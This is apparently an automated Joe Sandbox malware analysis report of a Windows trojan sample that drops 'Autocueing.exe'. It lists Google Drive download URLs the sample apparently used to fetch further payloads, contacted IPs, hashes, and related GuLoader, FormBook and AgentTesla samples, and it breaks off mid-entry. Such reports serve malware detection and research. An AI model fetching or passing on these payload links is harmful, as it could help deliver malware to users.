                                                                                          		high
                                                                                          https://translate.google.com/translate_a/element.jsAutocueing.exe, 00000008.00000003.3006734632.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.2516453019.0000000004CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://drive.google.com/7Autocueing.exe, 00000008.00000003.3089505610.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3100280584.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3076301554.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3065378024.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.2516453019.0000000004CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://drive.usercontent.goAutocueing.exe, 00000008.00000003.3089505610.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3042334490.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3279195163.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3256468742.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3302032884.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000002.3395765664.0000000003432000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3242307516.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3100280584.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3076301554.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3229828688.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3267586031.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3217749559.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3053814050.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3112204517.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3242196784.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3230193224.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3290522489.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3029253824.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3065378024.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  https://drive.usercontent.google.com/1jcTSjYxsyVm7jljsm6mguYH2OPW7zI44BbsZwkRdo05na2bmIgphK8NDAAutocueing.exe, 00000008.00000003.3100280584.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3112204517.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&eAutocueing.exe, 00000008.00000003.3346088252.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3357341329.00000000034A0000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3346141316.000000000349E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://drive.google.com/V9Autocueing.exe, 00000008.00000002.3395765664.00000000033F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://drive.usercontent.google.com/dAutocueing.exe, 00000008.00000003.3089505610.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3100280584.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3076301554.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3053814050.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3112204517.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3065378024.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://drive.google.com/1005E9DC5D8267227684D07A38Autocueing.exe, 00000008.00000003.2780528849.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2695356999.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2708087359.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2778129056.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2754450948.0000000003462000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2671904849.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2754294780.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2765237850.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2731411699.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2719652725.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2646384856.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2658888711.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2683597497.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2765349755.0000000003462000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2635189602.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://contoso.com/Iconpowershell.exe, 00000002.00000002.2519636731.0000000005BC5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://drive.google.com/0Autocueing.exe, 00000008.00000003.2609864429.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3256468742.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2609988304.0000000003463000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://drive.google.com/trolno-cacheAutocueing.exe, 00000008.00000003.2922227503.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://www.ftp.ftp://ftp.gopher.Autocueing.exe, 00000008.00000001.2515081160.0000000000649000.00000020.00000001.01000000.00000008.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://drive.usercontent.google.com/Autocueing.exe, 00000008.00000003.3006734632.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://nsis.sf.net/NSIS_ErrorErrorav8XPPpdBc.exe, Autocueing.exe.2.drfalse
                                                                                                                        		high
                                                                                                                        https://drive.google.com/HAutocueing.exe, 00000008.00000003.2852974758.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2806891781.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2971489970.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://ssl.gAutocueing.exe, 00000008.00000003.2899186565.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2910627021.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2922227503.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          https://drive.google.com/FAutocueing.exe, 00000008.00000003.3256468742.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.2516453019.0000000004CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvAutocueing.exe, 00000008.00000003.3279195163.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3267586031.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://drive.usercontent.google.com/servAutocueing.exe, 00000008.00000003.2995816614.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2982316924.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3018318612.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3006734632.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://drive.google.com/4C7797FE41F2A87CA6B2734C43Autocueing.exe, 00000008.00000003.2609864429.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2622041447.0000000003464000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2621619142.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2646384856.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2609988304.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2658888711.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2635189602.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://drive.google.com/mPqiekafjqjNlgzAtvpzw_A7pqv34Autocueing.exe, 00000008.00000003.3229828688.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3230193224.0000000003463000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://drive.google.com/ertificatesAutocueing.exe, 00000008.00000003.2780528849.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2708087359.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2830233002.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2778129056.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2876323516.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2754450948.0000000003462000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2754294780.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2765237850.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2818489505.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2731411699.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2852974758.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2719652725.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2806891781.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2864019301.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2791678279.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2765349755.0000000003462000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2841476240.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://drive.usercontent.google.com/DAutocueing.exe, 00000008.00000003.3312768786.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000002.3395765664.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3324327497.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3334442052.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3391633613.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3368992406.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3379961503.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3357241032.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.2516453019.0000000004CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_AAutocueing.exe, 00000008.00000003.3256468742.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3242307516.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3229828688.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3217749559.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3242196784.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3230193224.0000000003463000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdAutocueing.exe, 00000008.00000001.2515081160.00000000005F2000.00000020.00000001.01000000.00000008.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://drive.usercontent.google.com/-=Autocueing.exe, 00000008.00000003.3346088252.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3312768786.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3193568265.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3334442052.0000000003465000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2995816614.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2609864429.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3122962700.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3089505610.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3042334490.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2780528849.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2695356999.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3279195163.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000002.3395765664.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2708087359.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2830233002.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3147400004.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3256468742.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2933747254.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3324327497.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2778129056.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3302032884.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://drive.usercontent.google.com/downloaWdAutocueing.exe, 00000008.00000002.3395765664.0000000003432000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://drive.usercontent.google.com/download?id=1_vAutocueing.exe, 00000008.00000003.3089505610.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3042334490.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3100280584.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3076301554.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3053814050.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3112204517.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3029253824.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3065378024.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://drive.google.com/(Autocueing.exe, 00000008.00000003.3159034020.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3170311174.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://drive.usercontent.google.com/id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&eAutocueing.exe, 00000008.00000002.3395765664.0000000003432000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://drive.google.com/~XNAutocueing.exe, 00000008.00000003.3312768786.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3334442052.0000000003465000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3334572115.000000000349E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3279195163.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3256468742.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3324327497.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3302032884.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3312825589.000000000349E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3267586031.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3290522489.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://drive.usercontent.google.com/6Autocueing.exe, 00000008.00000003.2956303775.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2971489970.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://drive.usercontent.google.com/roject.netAutocueing.exe, 00000008.00000003.3346088252.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000002.3395765664.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3334442052.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3391633613.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3368992406.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3379961503.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3357241032.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		high

                                                                                                                                                                World Map of Contacted IPs

                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                                Public IPs

                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                142.250.185.129
                                                                                                                                                                		drive.usercontent.google.comUnited States
                                                                                                                                                                		15169GOOGLEUSfalse
                                                                                                                                                                142.250.185.142
                                                                                                                                                                		drive.google.comUnited States
                                                                                                                                                                		15169GOOGLEUSfalse

                                                                                                                                                                General Information

                                                                                                                                                                Joe Sandbox version:42.0.0 Malachite
                                                                                                                                                                Analysis ID:1588780
                                                                                                                                                                Start date and time:2025-01-11 05:26:23 +01:00
                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                Overall analysis duration:0h 6m 31s
                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                Report type:full
                                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                Number of analysed new started processes analysed:9
                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                Technologies:
                                                                                                                                                                • HCA enabled
                                                                                                                                                                • EGA enabled
                                                                                                                                                                • AMSI enabled
                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                Sample name:av8XPPpdBc.exe
                                                                                                                                                                renamed because original name is a hash value
                                                                                                                                                                Original Sample Name:a86c116c881fc184302b73c91a25e0bf0a8952971815891def98b50ff3c7e7d1.exe
                                                                                                                                                                Detection:MAL
                                                                                                                                                                Classification:mal100.troj.evad.winEXE@6/13@2/2
                                                                                                                                                                EGA Information:
                                                                                                                                                                • Successful, ratio: 33.3%
                                                                                                                                                                HCA Information:
                                                                                                                                                                • Successful, ratio: 92%
                                                                                                                                                                • Number of executed functions: 73
                                                                                                                                                                • Number of non-executed functions: 31
                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                • Found application associated with file extension: .exe

                                                                                                                                                                Warnings

                                                                                                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                                                • Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.109.210.53
                                                                                                                                                                • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                • Execution Graph export aborted for target powershell.exe, PID 5072 because it is empty
                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                                Simulations

                                                                                                                                                                Behavior and APIs

                                                                                                                                                                TimeTypeDescription
                                                                                                                                                                23:27:16API Interceptor37x Sleep call for process: powershell.exe modified
                                                                                                                                                                23:28:01API Interceptor34x Sleep call for process: Autocueing.exe modified

                                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                                IPs

                                                                                                                                                                No context

                                                                                                                                                                Domains

                                                                                                                                                                No context

                                                                                                                                                                ASNs

                                                                                                                                                                No context

                                                                                                                                                                JA3 Fingerprints

                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                37f463bf4616ecd445d4a1937da06e19QNuQ5e175D.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                • 142.250.185.142
                                                                                                                                                                • 142.250.185.129
                                                                                                                                                                7uY105UTJU.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                • 142.250.185.142
                                                                                                                                                                • 142.250.185.129
                                                                                                                                                                QNuQ5e175D.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                • 142.250.185.142
                                                                                                                                                                • 142.250.185.129
                                                                                                                                                                iwEnYIOol8.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                • 142.250.185.142
                                                                                                                                                                • 142.250.185.129
                                                                                                                                                                Ntwph4urc1.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                • 142.250.185.142
                                                                                                                                                                • 142.250.185.129
                                                                                                                                                                2976587-987347589.07.exeGet hashmaliciousNitol, XmrigBrowse
                                                                                                                                                                • 142.250.185.142
                                                                                                                                                                • 142.250.185.129
                                                                                                                                                                2976587-987347589.08.exeGet hashmaliciousNitolBrowse
                                                                                                                                                                • 142.250.185.142
                                                                                                                                                                • 142.250.185.129
                                                                                                                                                                Ntwph4urc1.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                • 142.250.185.142
                                                                                                                                                                • 142.250.185.129
                                                                                                                                                                2976587-987347589.08.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 142.250.185.142
                                                                                                                                                                • 142.250.185.129
                                                                                                                                                                yMXFgPOdf2.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                • 142.250.185.142
                                                                                                                                                                • 142.250.185.129

                                                                                                                                                                Dropped Files

                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\nswE27F.tmp\nsExec.dll7uY105UTJU.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                  iwEnYIOol8.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                    678763_PDF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                      file.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                        Shipping documents 000022999878999800009999.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                          Ze1Ueabtx5.imgGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                            Documenti di spedizione 0009333000459595995.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                              4hIPvzV6a2.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exeGet hashmaliciousUnknownBrowse

                                                                                                                                                                                    Created / dropped Files

                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:modified
                                                                                                                                                                                    Size (bytes):53158
                                                                                                                                                                                    Entropy (8bit):5.062687652912555
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
                                                                                                                                                                                    MD5:5D430F1344CE89737902AEC47C61C930
                                                                                                                                                                                    SHA1:0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
                                                                                                                                                                                    SHA-256:395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
                                                                                                                                                                                    SHA-512:DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                                                                    Preview:PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\Autocueing.exe

                                                                                                                                                                                    Download File
                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
